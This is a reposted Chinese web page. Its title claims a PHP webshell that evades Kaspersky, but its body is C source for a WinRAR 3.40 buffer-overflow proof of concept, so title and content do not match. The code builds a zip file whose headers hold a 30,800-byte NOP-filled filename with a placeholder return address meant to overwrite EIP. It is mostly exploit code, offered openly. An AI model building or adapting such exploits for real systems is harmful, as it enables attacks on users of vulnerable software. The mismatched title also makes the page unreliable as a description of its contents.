首页 编程 软件学院 查看内容

不被卡巴斯基杀的php马

2004-12-20 04:02 866 0

摘要: 转自:火狐论坛 /*WinRAR 3.40 Buffer Overflow POCThanks to Miguel Tarasco Acuna. He has made a wonderful co...
关键词: WORDCabecera WORD DWORDCabecera Cabecera DWORD ZipFile nbsp filename sizeof 0000

转自:火狐论坛 /*WinRAR 3.40 Buffer Overflow POCThanks to Miguel Tarasco Acuna. He has made a wonderful code forMicrosoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)which I edited and made this code by.  Coded by Vafa Khoshaein - [email][email protected][/email]  Vulnerability discovery date : December 10, 2004  Run this code and creat vulnerable_zip.zip then open the file in WinRAR 3.40  there exists a file, Try to delete the file - SECU*/#include <'stdio.h>#include <'windows.h>#pragma pack(1)#define DATOS "[email][email protected][/email]"typedef struct {DWORD Signature;WORD VersionNeeded;WORD GeneralPurposeFlag;WORD CompressionMethod;WORD ModFileTime;WORD ModFileDate;DWORD Crc32;DWORD CompressedSize;DWORD UncompressedSize;WORD FilenameLength;WORD ExtraFieldLength;}TOPHEADER;typedef struct {DWORD Signature;WORD MadeVersion;WORD VersionNeeded;WORD GeneralPurposeFlag;WORD CompressionMethod;WORD ModFileTime;WORD ModFileDate;DWORD Crc32;DWORD CompressedSize;DWORD UncompressedSize;WORD FilenameLength;WORD ExtraFieldLength;WORD FileCommentLength;WORD DiskNumberStart;WORD InternalFileAttributes;DWORD ExternalFileAttributes;DWORD RelativeOffsetOfLocalHeader;}MIDDLEHEADER;typedef struct {DWORD Signature;WORD NumOfThisDisk;WORD NumDisckStartCentralDirectory;WORD NumEntriesCentralDirOnThisDisk;WORD TotalNumEntriesCentralDir;DWORD SizeCentralDirectory;DWORD OffsetCentraDirRespectStartDiskNum;WORD ZipCommentLength;}BOTTOMHEADER;int main(int argc,char *argv[]) {FILE *ZipFile;TOPHEADER *Cabecera1;MIDDLEHEADER *Cabecera2;BOTTOMHEADER *Cabecera3;DWORD c;UINT i;char *filename;char *url;printf(" WinRAR 3.40 Buffer Overflow POC ");printf(" Coded by Vafa Khoshaein ([email][email protected][/email]) ");if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {  printf(" Error in creating vulnerable_zip.zip ");  exit(1);}c=30800;filename=(char*)malloc(sizeof(char)*c);memset(filename,0,sizeof(filename));for( i=0;i<30800;i++) filename[i]=0x90;// Return Addressmemcpy(&filename[479],"AAAA",4); /////////// Ret Addr EIP 0x41414141Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));memset(Cabecera1,0,sizeof(TOPHEADER));memset(Cabecera2,0,sizeof(MIDDLEHEADER));memset(Cabecera3,0,sizeof(BOTTOMHEADER));Cabecera1->Signature=0x00000050; // DWORDCabecera1->VersionNeeded=0x000A; // WORDCabecera1->GeneralPurposeFlag=0x0002; // WORDCabecera1->CompressionMethod=0x0000; // WORDCabecera1->ModFileTime=0x1362; // WORDCabecera1->ModFileDate=0x3154; // WORDCabecera1->Crc32=0x85B36639; // DWORDCabecera1->CompressedSize=0x00000015; // DWORDCabecera1->UncompressedSize=0x00000015; // DWORDCabecera1->FilenameLength=(WORD)c; // WORD 0x0400Cabecera1->ExtraFieldLength=0x0000; // WORDCabecera2->Signature=0x02014B50; // DWORDCabecera2->MadeVersion=0x0014; // WORDCabecera2->VersionNeeded=0x000A; // WORDCabecera2->GeneralPurposeFlag=0x0002; // WORDCabecera2->CompressionMethod=0x0000; // WORDCabecera2->ModFileTime=0x1362; // WORDCabecera2->ModFileDate=0x3154; // WORDCabecera2->Crc32=0x85B36639; // DWORDCabecera2->CompressedSize=0x00000015; // DWORDCabecera2->UncompressedSize=0x00000015; // DWORDCabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);Cabecera2->ExtraFieldLength=0x0000; // WORDCabecera2->FileCommentLength=0x0000; // WORDCabecera2->DiskNumberStart=0x0000; // WORDCabecera2->InternalFileAttributes=0x0001; // WORDCabecera2->ExternalFileAttributes=0x00000020; // DWORDCabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORDCabecera3->Signature=0x06054B50; // DWORDCabecera3->NumOfThisDisk=0x0000; // WORDCabecera3->NumDisckStartCentralDirectory=0x0000; // WORDCabecera3->NumEntriesCentralDirOnThisDisk=0x0001;Cabecera3->TotalNumEntriesCentralDir=0x0001;Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c;Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c;Cabecera3->ZipCommentLength=0x0000;fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);fwrite(filename, c, 1,ZipFile);fwrite(DATOS,strlen(DATOS),1,ZipFile);fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);fwrite(filename, c, 1,ZipFile);fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);fclose(ZipFile);printf(" vulnerable_zip.zip has been created ");return 1;}
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部